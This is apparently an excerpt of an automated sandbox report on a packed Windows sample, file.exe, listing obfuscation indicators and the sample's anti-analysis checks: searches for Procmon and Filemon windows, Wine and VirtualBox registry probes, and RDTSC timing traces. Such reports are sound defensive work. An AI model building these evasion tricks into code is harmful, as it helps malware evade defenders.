                Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.exe Static file information: File size 2159616 > 1048576
                Source: file.exe Static PE information: Raw size of rcutauay is bigger than: 0x100000 < 0x1a4400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rcutauay:EW;rnjpicgc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rcutauay:EW;rnjpicgc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe Static PE information: real checksum: 0x21a765 should be: 0x2127d2
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: rcutauay
                Source: file.exe Static PE information: section name: rnjpicgc
                Source: file.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F100E4 push edx; mov dword ptr [esp], 7FDD292Eh 0_2_00F1011D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F100E4 push 2ACCDAC4h; mov dword ptr [esp], edx 0_2_00F101C6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F100E4 push 0161CD5Ch; mov dword ptr [esp], esi 0_2_00F101EB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EBE0B3 push edx; mov dword ptr [esp], ecx 0_2_00EBE0CF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EBE0B3 push 3D100E8Ah; mov dword ptr [esp], ebx 0_2_00EBE0D7
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5A0DC push eax; retf 0_2_00A5A0F1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB0053 push 51A4AA46h; mov dword ptr [esp], edi 0_2_00EB007C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4F069 push ecx; mov dword ptr [esp], eax 0_2_00D4F09F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4F069 push 4FEBE168h; mov dword ptr [esp], esp 0_2_00D4F0A7
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4F069 push ebx; mov dword ptr [esp], ecx 0_2_00D4F0CE
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4F069 push edx; mov dword ptr [esp], 212F5C51h 0_2_00D4F0D2
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F2703B push esi; mov dword ptr [esp], ecx 0_2_00F26F85
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F2703B push edi; mov dword ptr [esp], eax 0_2_00F27060
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F55021 push ecx; mov dword ptr [esp], eax 0_2_00F55055
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3900D push edx; mov dword ptr [esp], esi 0_2_00F3902B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5 push 4083E189h; mov dword ptr [esp], ebx 0_2_00E2128B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5 push 6CF881E9h; mov dword ptr [esp], eax 0_2_00E2129C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5 push ebp; mov dword ptr [esp], edx 0_2_00E21375
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5 push edx; mov dword ptr [esp], ebx 0_2_00E213BE
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E211C5 push ebx; mov dword ptr [esp], edi 0_2_00E21402
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ED21AF push 6CAE7A00h; mov dword ptr [esp], edi 0_2_00ED21DB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F26194 push eax; mov dword ptr [esp], ecx 0_2_00F261B2
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5A109 push eax; retf 0_2_00A5A119
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9214A push edi; mov dword ptr [esp], ebx 0_2_00F9216C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F09122 push ecx; mov dword ptr [esp], esp 0_2_00F0916A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F02123 push ecx; mov dword ptr [esp], esi 0_2_00F0217F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0E100 push edx; mov dword ptr [esp], ecx 0_2_00E0E151
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0E100 push 4B25F8A7h; mov dword ptr [esp], ebp 0_2_00E0E159
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0E100 push 17940D78h; mov dword ptr [esp], edx 0_2_00E0E225
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0E100 push 1BBC947Dh; mov dword ptr [esp], edi 0_2_00E0E23D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1D105 push 0E8A5FC2h; mov dword ptr [esp], edx 0_2_00F1D13C
                Source: file.exe Static PE information: section name: rcutauay entropy: 7.954004161213286

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-37181
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3BB8 second address: EA3BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3BC2 second address: EA3BCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3BCE second address: EA3BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E948DA second address: E948E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E948E0 second address: E948E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3183 second address: EA31A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAB30C06326h 0x00000008 jmp 00007FAB30C0632Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA31A0 second address: EA31A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA31A4 second address: EA31B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA31B2 second address: EA31B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA31B6 second address: EA31BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA31BC second address: EA31C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA31BC second address: EA31C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA32F1 second address: EA3313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06337h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3313 second address: EA3317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3317 second address: EA3323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3323 second address: EA3336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAB30D3D446h 0x0000000b jno 00007FAB30D3D446h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA346F second address: EA347B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAB30C06326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA67DB second address: EA67FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA67FD second address: EA6801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6801 second address: EA6805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6805 second address: EA680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA680B second address: EA6836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FAB30D3D456h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FAB30D3D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA696B second address: EA69A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 ja 00007FAB30C0633Ah 0x0000000f jmp 00007FAB30C06334h 0x00000014 jmp 00007FAB30C0632Bh 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007FAB30C06328h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA69A8 second address: EA6A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FAB30D3D446h 0x00000009 jmp 00007FAB30D3D453h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop eax 0x00000012 jmp 00007FAB30D3D458h 0x00000017 lea ebx, dword ptr [ebp+1245C6C1h] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FAB30D3D450h 0x00000023 push eax 0x00000024 jo 00007FAB30D3D44Eh 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6A73 second address: EA6AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jns 00007FAB30C06329h 0x0000000f push 00000000h 0x00000011 sbb si, 1AECh 0x00000016 push 6017A190h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FAB30C06338h 0x00000023 jmp 00007FAB30C06336h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6AC3 second address: EA6ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C35 second address: EA6C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C3A second address: EA6C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAB30D3D446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D17F1h], edi 0x00000016 mov dword ptr [ebp+122D2E2Fh], esi 0x0000001c push 00000000h 0x0000001e call 00007FAB30D3D44Ch 0x00000023 xor dword ptr [ebp+122D30EBh], edx 0x00000029 pop esi 0x0000002a call 00007FAB30D3D449h 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jo 00007FAB30D3D446h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6C7D second address: EA6CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FAB30C06336h 0x00000011 pushad 0x00000012 jmp 00007FAB30C06335h 0x00000017 jp 00007FAB30C06326h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8D1E second address: EB8D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE8B second address: E9CE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE95 second address: E9CE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE9A second address: E9CEAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A27 second address: EC5A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A31 second address: EC5A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A39 second address: EC5A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A3F second address: EC5A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A46 second address: EC5A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A4D second address: EC5A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC623F second address: EC6253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAB30D3D446h 0x00000008 jng 00007FAB30D3D446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6546 second address: EC654A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC654A second address: EC6573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAB30D3D450h 0x00000013 jmp 00007FAB30D3D44Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC681C second address: EC683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06335h 0x00000009 je 00007FAB30C0632Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B46 second address: EC6B71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D452h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FAB30D3D452h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6B71 second address: EC6B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAB30C06326h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6CD4 second address: EC6CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FAB30D3D446h 0x0000000e jc 00007FAB30D3D446h 0x00000014 jmp 00007FAB30D3D44Fh 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A797 second address: E8A7A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E3B second address: EC6E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FAB30D3D44Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E4A second address: EC6E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06332h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6E65 second address: EC6E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC7532 second address: EC7551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FAB30C06330h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC76B2 second address: EC76B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC76B6 second address: EC7719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06330h 0x00000007 jmp 00007FAB30C06333h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FAB30C06331h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FAB30C06337h 0x0000001c pushad 0x0000001d jmp 00007FAB30C0632Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC786A second address: EC7870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD474 second address: ECD47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDB16 second address: ECDB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDB20 second address: ECDB3B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FAB30C0632Ch 0x00000015 jns 00007FAB30C06326h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECEC20 second address: ECEC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C2BD second address: E8C2C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAB30C06326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B36 second address: ED1B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B3A second address: ED1B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1B48 second address: ED1B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED223B second address: ED2243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2243 second address: ED2253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D44Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DD0 second address: ED3DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FAB30C06328h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DE3 second address: ED3DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DE9 second address: ED3DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3DED second address: ED3E32 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FAB30D3D458h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAB30D3D458h 0x0000001f rdtsc
